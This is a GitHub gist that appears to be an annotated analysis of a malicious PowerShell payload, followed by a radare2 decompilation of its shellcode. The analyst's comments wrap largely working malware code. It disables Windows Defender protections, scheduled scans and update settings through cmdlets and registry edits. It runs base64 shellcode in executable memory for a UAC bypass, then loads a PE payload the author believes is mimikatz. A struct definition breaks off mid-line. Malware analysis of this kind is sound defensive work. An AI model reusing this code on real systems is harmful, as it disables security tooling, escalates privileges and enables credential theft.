Skip to content

Instantly share code, notes, and snippets.

@hackers-terabit

hackers-terabit/unknown payload analysis.ps1

Last active July 4, 2019 00:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hackers-terabit/6e325aa48709e247a9b7a0e5b961b5bf to your computer and use it in GitHub Desktop.
Save hackers-terabit/6e325aa48709e247a9b7a0e5b961b5bf to your computer and use it in GitHub Desktop.
Download ZIP
Raw
unknown payload analysis.ps1
function force-mkdir($path) {
if (!(Test-Path $path)) {
New-Item -ItemType Directory -Force -Path $path
}
}
# copied from https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1
Function Get-ProcAddress
{
Param
(
[OutputType([IntPtr])]
[Parameter( Position = 0, Mandatory = $True )]
[String]
$Module,
[Parameter( Position = 1, Mandatory = $True )]
[String]
$Procedure
)
$SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('S'+'ys'+'tem'+'.d'+'ll') } #Original is 'System.dll'
$UnsafeNativeMethods = $SystemAssembly.GetType('Mi'+'cro'+'so'+'ft'+'.Win32.'+'Un'+'sa'+'feN'+'a'+'tive'+'Meth'+'ods') #Original is $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('G'+'e'+'t'+'Mo'+'du'+'le'+'H'+'an'+'dle') #Original is 'GetModuleHandle'
$GetProcAddress = $UnsafeNativeMethods.GetMethod('G'+'et'+'Pr'+'oc'+'A'+'ddr'+'e'+'ss', [reflection.bindingflags] 'Public,Static', $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null); #Original is $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) #Original is just $GetProcAddress.Invoke($null, @([Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
}
#also copied from https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1
#this function would be used in this way:
# # SetWindowsHookEx
# $SetWindowsHookExAddr = Get-ProcAddress user32.dll SetWindowsHookExA
# $SetWindowsHookExDelegate = Get-DelegateType @([Int32], [MulticastDelegate], [IntPtr], [Int32]) ([IntPtr])
# $SetWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetWindowsHookExAddr, $SetWindowsHookExDelegate)
function Get-DelegateType
{
Param
(
[OutputType([Type])]
[Parameter( Position = 0)]
[Type[]]
$Parameters = (New-Object Type[](0)),
[Parameter( Position = 1 )]
[Type]
$ReturnType = [Void])
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('fabric') #Original $DynAssembly = New-Object Reflection.AssemblyName('ReflectedDelegate')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('fabricmodule', $false) #Original $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
$TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) #Interesting how MyDelegateType wasn't modified
$ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
$ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
$MethodBuilder.SetImplementationFlags('Runtime, Managed')
Write-Output $TypeBuilder.CreateType() #Original does not have Write-Output
}
# This function appears to be custom made. There were no publicly available scripts that match a signifcant portion of this function.
function dead-beef
{
#Variable declarations
$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32]) ([IntPtr])
$VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
$memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
$memcpyfromarrDelegate = Get-DelegateType @([IntPtr], [Byte[]], [IntPtr]) ([IntPtr])
$memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr]) ([IntPtr])
$memcpyfromarr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyfromarrDelegate)
$memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
$LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
$LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
$LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
$GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
$GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
$GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
#Check if it's running with elevated 'Administrator' role privilege
$iselevated = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
if($iselevated)
{
#set the deadbeef environment variable's value as blank for the process and user targets if elevated
[System.Environment]::SetEnvironmentVariable("deadbeef","","Process")
[System.Environment]::SetEnvironmentVariable("deadbeef","","User")
#Since it's admin,attempt to disable windows defender realtime protection and other self-explaining protections
try{
$null=Set-MpPreference -DisableRealtimeProtection $True
}catch{}
try{
$null=Set-MpPreference -DisableRealtimeMonitoring $True
$null=Set-MpPreference -DisableBehaviourMonitoring $True
$null=Set-MpPreference -DisableIOAVProtection $True
$null=Set-MpPreference -DisableScriptScanning $True
$null=Set-MpPreference -DisableBlockAtFirstSeen $True
}catch{}
#Attempt to disable windows defender related scheduled tasks
$tasks = @(
"\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance"
"\Microsoft\Windows\Windows Defender\Windows Defender Cleanup"
"\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"
"\Microsoft\Windows\Windows Defender\Windows Defender Verification"
)
foreach ($task in $tasks)
{
$parts = $task.split('\')
$name = $parts[-1]
$path = $parts[0..($parts.length-2)] -join '\'
try{
$null=Disable-ScheduledTask -TaskName "$name" -TaskPath "$path"
}catch{}
}
#Make registry changes to disable windows defender completely
$windef = "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender"
force-mkdir $windef
$null=Set-ItemProperty $windef "DisableAntiSpyware" 1
$null=Set-ItemProperty $windef "DisableRoutinelyTakingAction" 1
$windefrtp = "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection"
force-mkdir $windefrtp
$null=Set-ItemProperty $windefrtp "DisableRealtimeMonitoring" 1
$null=Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "WindowsDefender" -ea 0
#Disable windows auto-update
$au = "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU"
force-mkdir $au
$null=Set-ItemProperty $au "NoAutoUpdate" 0
$null=Set-ItemProperty $au "AUOptions" 2
$null=Set-ItemProperty $au "ScheduledInstallDay" 0
$null=Set-ItemProperty $au "ScheduledInstallTime" 3
$DeliveryOptimization = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization"
force-mkdir $DeliveryOptimization
$null=Set-ItemProperty $DeliveryOptimization "DODownloadMode" 0
#Finally Invoke the payload
Invoke-Payload -PEBytes $PEBytes32
}
else
{
#since it's not elevated, set the deadbeef environment variable under the User target to check later
[System.Environment]::SetEnvironmentVariable("deadbeef","$env:deadbeef","User")
#this payload will attempt to bypass UAC using the CSMTP COM object with clsid 3E5FC7F9-9A51-4367-9063-A120244FBEC7 https://attack.mitre.org/techniques/T1191/
#Radare2 disassembly: https://0paste.com/30908#hl
#C like decompilation at the bottom of thi post
[byte[]]$sc=[Convert]::FromBase64String('VYvsgew4AwAAV8ZFoHTGRaFtxkWi3cZFo27GRaQHxkWlwMZFpnXGRadOxkWot8ZFqWrGRarlxkWrdMZFrAnGRa2VxkWu4sZFr0zGRbBrxkWxZcZFsnLGRbNuxkW0ZcZFtWzGRbYzxkW3MsZFuC7GRblkxkW6bMZFu2zGRbwAxkWQR8ZFkWXGRZJ0xkWTQ8ZFlG/GRZVtxkWWbcZFl2HGRZhuxkWZZMZFmkzGRZtpxkWcbsZFnWXGRZ5XxkWfAINl5ACDZdwAaEx3JgfocgUAAIlF5IN95AB1CDPAQOlcBQAAaEn3AnjoVwUAAIlF3IN93AB1CGoCWOlBBQAAjUWwUP9V5IlFiIN9iAB1CGoDWOkpBQAAjUWQUP91iP9V3IlFjIN9jAB1CGoEWOkOBQAA/1WMiUX8g338AHUIagVY6foEAACDZegAi0Xoi038D7cEQYXAdAmLRehAiUXo6+mDpXz///8Ag2X4AINl9ADrB4tF9ECJRfSLReiD6AQ5RfRzdotF9ItN/A+3BEGD+C51YotF9ItN/A+3REECg/hldVKLRfSLTfwPt0RBBIP4eHVCi0X0i038D7cEQYP4LnUzi0X0g8AEiUX4agJYa8AAi038D7cEAYP4InUWi0X4i038D7cEQYP4InUHi0X4QIlF+OsF6Xj///+DffgAdQhqBljpOAQAADPAi034ZomETcj8//+DZewA6weLRexAiUXsi0XsO0X4fReLReyLTeyLVfxmiwxKZomMRcj8///r2oNl4ACLRfhAO0Xocx6LReCLTfiNRAEBi038D7cEQYXAdAmLReBAiUXg6+KDfeAAdBCLRfiLTfyNREECiYV8////x0XYBUAAgINl8ABqCVkzwI290P7///Orx4XQ/v//JAAAAMeF5P7//wQAAABqRVhmiYX0/v//amxYZomF9v7//2plWGaJhfj+//9qdlhmiYX6/v//amFYZomF/P7//2p0WGaJhf7+//9qaVhmiYUA////am9YZomFAv///2puWGaJhQT///9qOlhmiYUG////akFYZomFCP///2pkWGaJhQr///9qbVhmiYUM////amlYZomFDv///2puWGaJhRD///9qaVhmiYUS////anNYZomFFP///2p0WGaJhRb///9qclhmiYUY////amFYZomFGv///2p0WGaJhRz///9qb1hmiYUe////anJYZomFIP///2ohWGaJhSL///9qblhmiYUk////amVYZomFJv///2p3WGaJhSj///9qOlhmiYUq////antYZomFLP///2ozWGaJhS7///9qRVhmiYUw////ajVYZomFMv///2pGWGaJhTT///9qQ1hmiYU2////ajdYZomFOP///2pGWGaJhTr///9qOVhmiYU8////ai1YZomFPv///2o5WGaJhUD///9qQVhmiYVC////ajVYZomFRP///2oxWGaJhUb///9qLVhmiYVI////ajRYZomFSv///2ozWGaJhUz///9qNlhmiYVO////ajdYZomFUP///2otWGaJhVL///9qOVhmiYVU////ajBYZomFVv///2o2WGaJhVj///9qM1hmiYVa////ai1YZomFXP///2pBWGaJhV7///9qMVhmiYVg////ajJYZomFYv///2owWGaJhWT///9qMlhmiYVm////ajRYZomFaP///2o0WGaJhWr///9qRlhmiYVs////akJYZomFbv///2pFWGaJhXD///9qQ1hmiYVy////ajdYZomFdP///2p9WGaJhXb///8zwGaJhXj////GRcxvxkXNbMZFzmXGRc8zxkXQMsZF0S7GRdJkxkXTbMZF1GzGRdUAxkXAQ8ZFwW/GRcJHxkXDZcZFxHTGRcVPxkXGYsZFx2rGRchlxkXJY8ZFynTGRcsAjUXMUP9V5IlFhIN9hAB1CGoHWOmFAAAAjUXAUP91hP9V3IlFgIN9gAB1BWoIWOttjUXwUI1FoFCNhdD+//9QjYX0/v//UP9VgIlF2IN92AB1BoN98AB1BWoJWOtAagBqAGoA/7V8////agJYa8AAjYQFyPz//1D/dfCLRfCLAP9QJIlF2IN92AB0BWoKWOsN/3Xwi0XwiwD/UAgzwF+L5V3DVYvsg+xIZKEwAAAAiUXUi0XUi0AMiUXQi0XQi0AMiUXMi0XMiUXki0Xkg3gYAA+EbQEAAINl8ACLReSLQBiJReiLReSLSCyLQDCJTbiJRbyLReiLTegDSDyJTchqCFhrwACLTciLRAF4iUXYi0XkiwCJReSDfdgAdQLrq4Nl+ADrB4tF+ECJRfgPt0W6OUX4c0WLRbwDRfiJRfSLRfDB6A2LTfDB4RMLwYlF8ItF9A++AIP4YXwSi0X0D74Ai03wjUQB4IlF8OsMi0X0D74AA0XwiUXw66uLRegDRdiJReCLReCLQBiJRcSLReCLTegDSCCJTdyDZfgA6weLRfhAiUX4i0X4O0XED4OOAAAAg2XsAItF3IsAA0XoiUXAi0Xcg8AEiUXci0XAiUX0i0XswegNi03sweETC8GJReyLRfQPvgADReyJReyLRfRAiUX0i0X0D75A/4XAddGLRewDRfCJReyLRew7RQh1K4tF4ItN6ANIJItF+GaLBEFmiUX8i0Xgi03oA0gcD7dF/ItV6AMUgYvC6wzpX////+mG/v//M8CL5V3CBA==')
#allocate executable memory, copy the decoded payload to it and execute it for UAC bypass
$sc_in_memory = $VirtualAlloc.Invoke(0, $sc.Length, 0x00001000, 0x40)
$null = $memcpyfromarr.Invoke($sc_in_memory,$sc, $sc.Length)
$PayloadDelegate = Get-DelegateType @()([intptr])
$Payload = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sc_in_memory, $PayloadDelegate)
$result = $Payload.Invoke()
#wait two minutes if it does not immediately result in a UAC bypass
if($result -eq 0)
{
Start-Sleep 120
}
#clear the deadbeef variable - possibly, this will be checked by the $PEBytes32 payload
[System.Environment]::SetEnvironmentVariable("deadbeef","","Process")
[System.Environment]::SetEnvironmentVariable("deadbeef","","User")
#Execute tye final payload, $pebytes32 and $pebytes64 are found in mimikatz typically, it's possible the final payload of this function is mimikatz or a modified variant as well. this is consistent with the get-win32types function below.
Invoke-Payload -PEBytes $PEBytes32
}
}
# copied from https://gist.githubusercontent.com/mpgn/322aedd0bb2b2bdb5d60c2a361b77f05/raw/f4af90b0125c7e8c6628660bef5fc4be16969038/Invoke-Mi.txt
# it's supposed to invoke mimikatz https://www.virustotal.com/gui/file/c36572664731f058a282fa6f943e48fe80646f6613c3a46f3eee1f4a121b2158/community
Function Get-Win32Types
{
$Win32Types = New-Object System.Object
$Domain = [AppDomain]::CurrentDomain
$DynamicAssembly = New-Object System.Reflection.AssemblyName('ass') # Original: $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('mod', $false) #$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
#Enum MachineType
$TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
$TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
$TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
$TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
$MachineType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
#Enum MagicType
$TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
$MagicType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
#Enum SubSystemType
$TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
$SubSystemType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
#Enum DllCharacteristicsType
$TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
$TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
$TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
$TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
$TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
$DllCharacteristicsType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
########### STRUCT ###########
#Struct IMAGE_DATA_DIRECTORY
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
$IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
#Struct IMAGE_FILE_HEADER
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
$TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
$IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
#Struct IMAGE_OPTIONAL_HEADER64
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($TypeBuilder.DefineField('MinorImageV
## CSMTP bypass payload with r2 pdc
function fcn.00000000 () {
// 47 basic blocks
loc_0x0:
//DATA XREFS from fcn.00000000 (0x5fd, 0x5ff, 0x601)
push rbp
//DATA XREF from fcn.00000000 (0x251)
ebp = esp
//DATA XREF from fcn.00000000 (0x10c)
esp -= 0x338
//DATA XREFS from fcn.00000000 (0x28a, 0x5f8)
push rdi //arg1
//DATA XREF from fcn.00000000 (0x62b)
byte [var_60h] = 0x74 //'t'
byte [var_5fh] = 0x6d //'m'
byte [var_5eh] = 0xdd
byte [var_5dh] = 0x6e //'n'
byte [var_5ch] = 7
byte [var_5bh] = 0xc0
//DATA XREFS from fcn.00000000 (0x1d5, 0x1e4)
byte [var_5ah] = 0x75 //'u'
byte [var_59h] = 0x4e //'N'
byte [var_58h] = 0xb7
//DATA XREFS from fcn.00000000 (0x18b, 0x1ba)
byte [var_57h] = 0x6a //'j'
//DATA XREFS from fcn.00000000 (0x4d1, 0x4e5)
byte [var_56h] = 0xe5
//DATA XREFS from fcn.00000000 (0x46d, 0x49f)
byte [var_55h] = 0x74 //'t'
//DATA XREFS from fcn.00000000 (0x304, 0x305, 0x3b9)
byte [var_54h] = 9
byte [var_53h] = 0x95
//DATA XREF from fcn.00000000 (0x50d)
byte [var_52h] = 0xe2
//DATA XREFS from fcn.00000000 (0x3eb, 0x409, 0x502, 0x503)
byte [var_51h] = 0x4c //'L'
byte [var_50h] = 0x6b //'k'
byte [var_4fh] = 0x65 //'e'
byte [var_4eh] = 0x72 //'r'
byte [var_4dh] = 0x6e //'n'
byte [var_4ch] = 0x65 //'e'
byte [var_4bh] = 0x6c //'l'
byte [var_4ah] = 0x33 //'3'
byte [var_49h] = 0x32 //'2'
byte [var_48h] = 0x2e //'.'
//DATA XREFS from fcn.00000000 (0x2fb, 0x337, 0x39b)
byte [var_47h] = 0x64 //'d'
//DATA XREFS from fcn.00000000 (0x35f, 0x387)
byte [var_46h] = 0x6c //'l'
//DATA XREF from fcn.00000000 (0x2c9)
byte [var_45h] = 0x6c //'l'
byte [var_44h] = 0
byte [var_70h] = 0x47 //'G'
byte [var_6fh] = 0x65 //'e'
byte [var_6eh] = 0x74 //'t'
byte [var_6dh] = 0x43 //'C'
byte [var_6ch] = 0x6f //'o'
byte [var_6bh] = 0x6d //'m'
byte [var_6ah] = 0x6d //'m'
byte [var_69h] = 0x61 //'a'
byte [var_68h] = 0x6e //'n'
byte [var_67h] = 0x64 //'d'
byte [var_66h] = 0x4c //'L'
byte [var_65h] = 0x69 //'i'
byte [var_64h] = 0x6e //'n'
byte [var_63h] = 0x65 //'e'
byte [var_62h] = 0x57 //'W'
byte [var_61h] = 0
dword [var_1ch] &= 0
dword [var_24h] &= 0
push 0x726774c
fcn.00000642 ()
dword [var_1ch] = eax
var = dword [var_1ch] - 0
if (var) goto 0xe1 //unlikely
{
loc_0xe1:
//CODE XREF from fcn.00000000 (0xd7)
push 0x7802f749
fcn.00000642 () //(pstr 0x00177fb0) ".dll"
dword [var_24h] = eax
var = dword [var_24h] - 0
if (var) goto 0xfc //unlikely
{
loc_0xfc:
//CODE XREF from fcn.00000000 (0xf2)
eax = [var_50h] //".dll"
push rax //(pstr 0x00177fb0) ".dll"
qword [var_1ch] ()//0xffffffffffffffe4(0x0, 0x0, 0x0, 0x0)
dword [var_78h] = eax
var = dword [var_78h] - 0
if (var) goto 0x114 //likely
{
loc_0x114:
//CODE XREF from fcn.00000000 (0x10a)
eax = [var_70h] //"ndLineW"
push rax //(pstr 0x00177f90) "ndLineW"
push qword [var_78h] //(pstr 0x00177fb0) ".dll"
qword [var_24h] ()//0xffffffffffffffdc(0x0, 0x0, 0x0, 0x0)
dword [var_74h] = eax
var = dword [var_74h] - 0
if (var) goto 0x12f //likely
{
loc_0x12f:
//CODE XREF from fcn.00000000 (0x125)
qword [var_74h] () //(pstr 0x00177f90) "ndLineW"; 0xffffffffffffff8c(0x0, 0x0, 0x0, 0x0)
dword [var_4h] = eax
var = dword [var_4h] - 0
if (var) goto 0x143 //unlikely
{
loc_0x143:
//CODE XREF from fcn.00000000 (0x139)
dword [var_18h] &= 0
do
{
loc_0x147:
//CODE XREF from fcn.00000000 (0x15c)
eax = dword [var_18h]
ecx = dword [var_4h]
eax = word [rcx + rax*2]
var = eax & eax
if (!var) goto 0x15e //unlikely
} while (?);
} while (?);
} while (?);
} while (?);
} while (?);
} while (?);
}
return;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment